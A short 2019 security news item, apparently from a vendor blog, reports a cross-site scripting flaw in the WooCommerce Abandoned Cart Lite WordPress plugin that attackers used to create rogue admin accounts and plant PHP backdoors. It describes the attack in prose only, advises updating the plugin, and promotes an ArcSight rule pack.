Delaware, USA – March 13, 2019 – Extending WordPress capabilities with plugins doesn’t only widen the default functions but also brings a number of risks. Woocommerce Abandoned Cart Lite plugin provides a webadmin with the report of the products frequently bought from the site as well as the details about the shopping card list. However, the WordFence representative strongly recommends updating the plugin to its latest version that has already the built-in cross-site scripting (XSS) protection.
Use the vulnerable version of the plugin provides the attackers with wide open spaces for exploiting cross-site scripting vulnerabilities. The malicious code is inserted to one of the contact information fields directly and it downloads the malicious script from the specially created link. After that, a new admin account is created with the hardcoded username and the password. Another purpose of the script is to check the system for any disabled plugin and inject into its code a PHP backdoor in case the rogue admin account is discovered.
The vulnerability is patched by WordFence firewall, but the researchers do not have the exact number of either the XSS infected sites or the cases of successfully compromised sites. The vivid example of neverlasting activity of exploiting websites plugins vulnerabilities and putting away of sight a malicious code is MageCart groups’ attacks (1, 2). You can leverage your ArcSight with the Web Application Security Framework rule pack to reduce risks related to attacks on your publicly accessible online resources: https://my.socprime.com/en/integrations/web-application-security-framework-arcsight